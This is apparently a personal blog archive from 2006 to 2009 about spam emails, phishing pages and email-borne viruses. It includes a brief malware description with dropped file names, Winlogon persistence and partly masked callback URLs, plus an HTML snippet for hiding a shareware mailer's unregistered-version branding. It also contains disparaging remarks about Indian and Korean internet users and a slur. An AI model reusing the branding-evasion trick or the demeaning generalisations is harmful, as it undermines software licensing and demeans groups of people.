Patrick Nortoni

September 25th, 2009

Sometimes, people just catch you on an off day, causing your usual cool exterior to crack and spew forth a torrent of vitriol and abuse.  Today wasn’t one of those days, but ‘Patrick Nortoni’ managed to annoy me a great deal by posting his default spam email nonsense into the contact form on one of my sites:

We would like to get your website on first page of Google.All of our processes use the most ethical “white hat” Search Engine Optimization techniques that will not get your website banned or penalized. Please reply and I would be happy to send you a proposal. In order for us to respond to your request for information, please include your companys website address (mandatory) and or phone number.

Patrick Nortoni
patrick2316@gmail.com
SEO Company
000-000-0000


Sent at 21:36.21 on 22nd September 2009 from 122.160.99.22

Where to begin with this nonsense?  He sends me an non-personalised email through a mail form using a GMail address and doesn’t even bother to include a real phone number.  Hmm.. I wonder why that could be?  Let’s take a look at that IP address…

Click to view Full Image

Click to view Full Image

Now I’m sure that there are plenty of hard-working, honest IT workers in India, but I never seem to meet them. All I get are the spam emails for outsourcing my web design work or – in the case of Patrick Nortoni here – my SEO work.

A quick Google search for ‘Patrick Nortoni’ throws up comment spam. Lots of comment spam. Comment spam pimping his great SEO services on pages that have absolutely nothing to do with SEO. Presumably, these are his ‘most ethical “white hat” Search Engine Optimization techniques’. Whatever, I won’t be wasting my time with this fool, and neither should you.

Update:
It’s a funny old game. This post is now 4th 2nd on Google for ‘Patrick Nortoni’, and not a comment spam in sight.

Tags: ,
Posted in Internet, Spam & Viruses | 16 Comments »

Worldpay CARD Transaction Confirmation Spam/Virus

June 25th, 2009

This afternoon I received an email with the subject “Worldpay CARD transaction Confirmation“, which instantly caught my attention because I use Worldpay while paying off one of my credit cards, and for a moment I wondered if I had done it and forgotten about it.

The email content was as follows:

Thank you!

Your transaction has been processed by WorldPay, on behalf of Amazon Inc.

The invoice file is attached to this message.
This is not a tax receipt.
We processed your payment.
Amazon Inc has received your order,
and will inform you about delivery.
Sincerely,
Amazon Team

This confirmation only indicates that your transaction has been processed successfully.
It does not indicate that your order has been accepted.
It is the responsibility of Amazon Inc to confirm that your order has been accepted, and to deliver any goods or services you have ordered.

All very convincing and official-looking, but Amazon doesn’t use Worldpay, and the email was not sent to amazon@<my email domain> – it was sent to my office address which is only used for, well, office stuff.

The email attachment is a simple HTML file so it is not picked up as anything dodgy, but it comprises a single META REFRESH line directing you to an executable file hosted elsewhere, so don’t open the attachment.

Tags: , , ,
Posted in Internet, Spam & Viruses | No Comments »

‘Your internet access is going to get suspended’ Email

November 10th, 2008

If you receive an email with the subject ‘Your internet access is going to get suspended’ then don’t panic – it’s another Virus doing the rounds that sends out these worryingly-phrased emails in an attempt to trick you into running the attachment and infecting yourself with the payload. Several sites have picked up on it and a few of the popular virus scanning packages had spotted is already.

The message reads:

Your internet access is going to get suspended

The Internet Service Provider Consorcium was made to protect the rights of
software authors, artists.  We conduct regular wiretapping on our networks,
to monitor criminal acts.

We are aware of your illegal activities on the internet wich were originating from

You can check the report of your activities in the past 6 month that we have
attached. We strongly advise you to stop your activities regarding the illegal
downloading of copyrighted material of your internet access will be suspended.

Sincerely
ICS Monitoring Team

The message contains a randomly-named zip file in the format user-XXXXXXXX-activities.zip and after extracting the file is user-XXXXXXXX-activities.exe where XXXXXXXX is random characters.

The malware registers a Winlogon notification package so that the installed module is loaded into the address space of winlogon.exe. The files cabpck.dll (known as theMal/TinyDL-T by Sophos), k86.bin and krnlcab.sys (known as the Backdoor:Win32/Haxdoor by Microsoft)) are created in the %System% folder.

A directory %Temp%\msi_setup will be created and a new connection with some host is made: http://****-****.biz/jerken/data.php?trac kid=706172616D3D6 or http://*****.net/22/data.php?trackid=7061 72616D3D636D64266C616E6

It makes a change from the usual ‘Please find your receipt attached’ approach, but my main concern is the number of clients who will instantly think they’ve done something wrong and go ahead and get infected.

Tags: , ,
Posted in Internet, Spam & Viruses | No Comments »

Email Exchange of the Week

April 25th, 2007

By now, many of you will be well aware of my hatred for all things MySpace-related. Here’s a typical email exchange, illustrating just why I detest them…

    Subject: you are downloaded stuff to my computer without my permission
    i do not know why u r pop up on my screen but can u please tnot pop up

Sure, I can ‘tnot pop up’. Suspecting another d04.net scam, since the email had come in via the d04.net account, I wrote back:

    Hi,

    D04.net does not download anything to anyone’s computer. It is a simple web page. Please read about what d04.net is before emailing. Thanks.

    http://www.d04.net/

    What link did you click on to get to the website? What site did it link to? (should end in d04.net is it’s on our service).

    D

Of course, that didn’t actually make the writer stop and think…

    yes it does it putting nasty web sites on my comnputer thank i have alrwady report it to spam any way u do not know what u are talking about every time i trying to send someone a message a my space your web site po up why

Oh noes! I’ve been ‘alrwady report to spam’! I write back again…

    Please tell me what address is at the top of the page. Do you see a blue bar across the top with a ‘Report This Site’ button on it? If so, please click the button and I will know what site you are talking about.

    Please don’t tell me what my site does or doesn’t do – I wrote it. If you are not willing to answer the questions I ask, I can’t help you.

    D

But no, I was WRONG! I obviously DON’T know what my own website does…

    yes it does when i try to get on my space to send message to some one why do your web page come up u know i am going to report u to spam

Perhaps my web page comes up because.. I dunno.. you’re not looking at MySpace anymore or something equally impossible? Honestly, I couldn’t be bothered to write back after this because it was only going to go downhill from here. Sheesh!

Tags: , , , ,
Posted in Internet, Problems, Spam & Viruses | No Comments »

ImageShack Spam

April 4th, 2007

The war on Spam Filters continues with a new assault – images hosted on ImageShack. You receive an email with just a couple of lines of random text and a link to an ImageShack image. That’s your lot.

ImageShack themselves seem to be pretty quick about taking them down, possibly because others have already reported them, as I’ve never actually seen one working. This leads me to suspect spammers have become even more retarded than previously.

Tags:
Posted in Internet, Spam & Viruses | No Comments »

Personal SpamAssassin Spam Score Record Broken.

December 22nd, 2006

Holy shit. I wasn’t going to post so soon after yesterday’s but this is insane. I am running SpamAssassin on this server which awards to emails it considers spam based on various criteria. Bearing in mind the default (afaik – mine is anyway) cut off is 6 points, I was somewhat suprised to see a message that scored a whopping 49.8 points in my junk tray – a good five points over my previous record.

Here’s the summary – why the hell did the sender think this would ever get anywhere?

Spam detection software, running on the system "xxxxxxxxxxxxxx", has
identified this incoming email as possible spam.  The original message
has been attached to this so you can view it (if it isn't spam) or label
similar future email.  If you have any questions, see the administrator
of that system for details.
Content preview:  email advertise like this to 8,000,000 people... free..
  http://www.advertisingemailcorporation.com/ the above noncommercial
  offer is only for noncommercial charities only. press on charity info on
  our web site for full and complete details. this offer is not a
  commercial service and is not at all for sale or lease or trade of any
  kind. [...]
Content analysis details:   (49.8 points, 6.0 required)
 pts rule name              description
---- ---------------------- --------------------------------------------------
 2.4 MSGID_YAHOO_CAPS       Message-ID has ALLCAPS@yahoo.com
 4.5 MIME_BOUND_DD_DIGITS   Spam tool pattern in MIME boundary
 1.0 NO_REAL_NAME           From: does not include a real name
 1.5 FROM_BLANK_NAME        From: contains empty name
 2.2 HELO_DYNAMIC_SPLIT_IP  Relay HELO'd using suspicious hostname (Split
                            IP)
 4.4 MSGID_SPAM_CAPS        Spam tool Message-Id: (caps variant)
 0.0 UNPARSEABLE_RELAY      Informational: message has unparseable relay lines
 3.5 BAYES_99               BODY: Bayesian spam probability is 99 to 100%
                            [score: 1.0000]
 1.5 RAZOR2_CF_RANGE_E8_51_100 Razor2 gives engine 8 confidence level
                            above 50%
                            [cf: 100]
 1.5 RAZOR2_CF_RANGE_E4_51_100 Razor2 gives engine 4 confidence level
                            above 50%
                            [cf: 100]
 1.0 RAZOR2_CHECK           Listed in Razor2 (http://razor.sf.net/)
 0.5 RAZOR2_CF_RANGE_51_100 Razor2 gives confidence level above 50%
                            [cf: 100]
 2.2 DCC_CHECK              Listed in DCC (http://rhyolite.com/anti-spam/dcc/)
 3.9 RCVD_IN_XBL            RBL: Received via a relay in Spamhaus XBL
                            [83.45.130.42 listed in sbl-xbl.spamhaus.org]
 1.9 RCVD_IN_NJABL_DUL      RBL: NJABL: dialup sender did non-local SMTP
                            [83.45.130.42 listed in combined.njabl.org]
 3.7 RCVD_DOUBLE_IP_SPAM    Bulk email fingerprint (double IP) found
 1.8 MISSING_SUBJECT        Missing Subject: header
 0.8 DIGEST_MULTIPLE        Message hits more than one network digest check
 1.6 MISSING_MIMEOLE        Message has X-MSMail-Priority, but no X-MimeOLE
 2.1 REPTO_QUOTE_YAHOO      Yahoo! doesn't do quoting like this
 3.7 FORGED_MSGID_YAHOO     Message-ID is forged, (yahoo.com)
 4.1 FORGED_MUA_OUTLOOK     Forged mail pretending to be from MS Outlook
The original message was not completely plain text, and may be unsafe to open with
some email clients; in particular, it may contain a virus, or confirm that your address
can receive spam.  If you wish to view it, it may be safer to save it to a file and open
it with an editor.
--
No virus found in this incoming message.
Checked by AVG Free Edition.
Version: 7.5.432 / Virus Database: 268.15.25/593 - Release Date: 19/12/2006 13:17

Tags: , , ,
Posted in Internet, Spam & Viruses | No Comments »

Spam, Spammers and Blocklists, oh my!

December 5th, 2006

I’m getting heartily sick of the whole email/spam/rbl situation at the moment.

Our office IP was blocked because we sent out a mass email on behalf of a customer, and it’s proving a pain in the arse to get it off the block lists. Not only does it take weeks, but customers are apparently using RBLs that – according to DNSStuff at least – should not be used.

AOL decided to block email from our server because we had an unsecure script on there at some point in the past. Rather than TELL us, the just blocked us and left it at that. Thanks, AOL! I’m now jumping through their hoops to try and get the ban lifted so that our clients can receive email directly (some of them insist on having their email forwarded to AOL, sigh…) rather than having me forward the bounces.

Customers don’t seem to appreciate how much spam/virus crap we’re dealing with these days. With SpamAssassin and MailScanner both running on the server I still receive around 30 a day that are slipping through. We have our spam filter level set at the default of 6 points and it catches the occasional legit email, so I dare not set it any lower.

And just today I had some stupid script kiddy hacker crap to put up with. Some pillock over at 222.121.133.34 (a Kornet IP) decided to script scan the server for default passwords, over and over again, from the same IP. Thanks, Korea! Jesus. I’ve sent them an email but I’m not holding out much hope.

It is time to go home yet?

Tags: , ,
Posted in Internet, Problems, Spam & Viruses | No Comments »

Latest Phishing Scam – Fake MySpace Login

August 11th, 2006

The Internet is full of very sad people. As if it wasn’t bad enough with phishing attempts to get bank account, PayPal or eBay details these people now have a new target – MySpace.

Over the last couple of days, pedwa2305@yahoo.com has tried to create fake MySpace login pages and used a Free Subdomain to try and fool users into giving up their details.

The login page itself is amateurish and unconvincing and has an advertising banner across the top of the page, but at least one person has emailed me (despite the domain being blocked, so all they see are d04-branded pages) asking to cancel her MySpace account.

Why MySpace? Is this a feeble attempt to hack a certain someone’s account or is it part of a much wider phishing attempt? I don’t care – the subdomains have been blocked and the account disabled. If anyone else creates one, the same will occur.

Tags: , ,
Posted in Internet, Spam & Viruses, Websites | No Comments »

Spammers now using CAPTCHA-style detection-avoidance.

May 9th, 2006

What strange times we live in. I’ve noticed that more and more of the spam I’ve been receiving has a random image attached to it – just a piece of clipart or a photo of a puppy or something. Maybe this random image is filtched from a compromised users’ harddrive and sent out to achieve some kind of email randomness in order to defeat Spam filters.

But over the last week I’ve had a new kind of Spam email. These have the email content rendered as an image, but in order to avoid sending out the same image, they’re now libreally scattered with yellow dots on the white background.

Many websites – for example Something Awful dot com – require that you study an image on the screen and enter the slightly distorted text from them image into a text box in order to log in to a restricted area – be it a forum or a control panel for example. The idea is that your average human will have no problem reading it, but a computer will struggle a bit – an interesting version of the Turing test designed to spot automated logins.

It seems that Spammers are now using a similar approach to avoid detection, with the (presumably) compromised machines taking the base Spam content as an image and sprinkling it with random data. The recipient doesn’t have any problem reading it but your Spam filter sees a unique image and doesn’t automatically know that it’s Spam, and so the message gets through and succeeds in annoying you for the fraction of a second longer that it takes to hit the Delete key.

Currently all the emails I have received have been the same black Helvetica/Arial text on a white background overlaid with the yellow randomness. How long before they start really following the examples of website CAPTCHA challenge-response logins and use random fonts, colours and backgrounds? Perhaps they’ll encounter the same problems, in that too much randomness can produce unreadable results. I doubt that will deter the Spammers though – they’ll simply continue sending out multiple junk messages.

Tags: ,
Posted in Internet, Spam & Viruses | No Comments »

Various Musings

April 20th, 2006

Various bits and bobs – general chunterings while having a break.

Fog on the Road!
A misty morning, guaranteed to get every nonce showing the world how wonderful their fog lights are. Great. I can see your car at least a hundred yards in front of me thanks to its car-shaped-ness, but put your fog lights on anyway – that’ll help!

Bulk Email Sender Hacking
OK so it’s not hacking as such, but I was playing about with a bulk email sender on the Mac and found that it didn’t check for strict HTML. Ordinarily it adds a TABLE to the bottom of all HTML emails containing something about using the unregistered version (cough!), and it does this by inserting a snippet of HTML just before the /BODY tag. If you do this:

    <DIV STYLE="visibility:hidden">
    </BODY>
    </HTML>
    </DIV>

at the end of your HTML email, this little bit of shareware branding gets hidden away.

Dinosaurs!
One of the reccurring dreams I have is of being chased around the streets by a Tyranosaurus Rex. I’ll hide in a room or an alleyway and it’ll appear outside the window or whatever, so I have so scurry off somewhere else. It never catches me, but I wake up rigid with fear. I’m 36 – why is this happening?

AOL Spam-Blocked – hahahah
Sweet, sweet justice. After revealing their Pay-to-Spam-Our-Users scheme recently, it was gratifying to see at least one AOL SMTP server cropping up on the BlockLists. It’s no longer on the SpamCop list which probably means it’s working in the majority of cases again, but it was nice while it lasted.

Googly Adsense
I managed to talk Foo info signing up to Google Adsense via my referral link (the big banner, here) and he’s already raking in the.. uh.. well a few cents here and there anyway. Presumably I get a tiny percentage for referring him as well.

The-Lottery.info
I added a chunk of code the The-Lottery.info last night to allow the owner to enter the prize breakdown for each draw and display it as part of the latest lottery results pages. After pondering it for, ooooh, a whole ten minutes, I eventually came up with a novel way of including default values for the various winning combinations. I though it was groovy, anyway.

Reformat Time!
Gah! I fired up the old laptop today and after it wheezed to a halt into Windows the wireless internet refused to work no matter what. Since I started working in Scunthorpe the laptop has been a dumping ground for all kinds of software (including bulk email stuff, actually) and is generally a mess – time to scrub it up!

Barry McGuigan in Cleethorpes
Barry McGuigan is in Cleethorpes on Monday 24th April at Joe Frater’s boxing night – more details here. I’ll be in attendance as usual. Amir Khan is due at the Christmas show – that should be a good one.

Site redesign
I know I mentioned the DHTML Window Thing (see right) a while ago and how I was going to implement it, but I’ve been thinking of cutting right back on the graphics and going back to plain text instead. The main reasons for this are compatibility and search engine optimisation – all those tables and shit just get in the way really.

Tags: , , ,
Posted in Various | No Comments »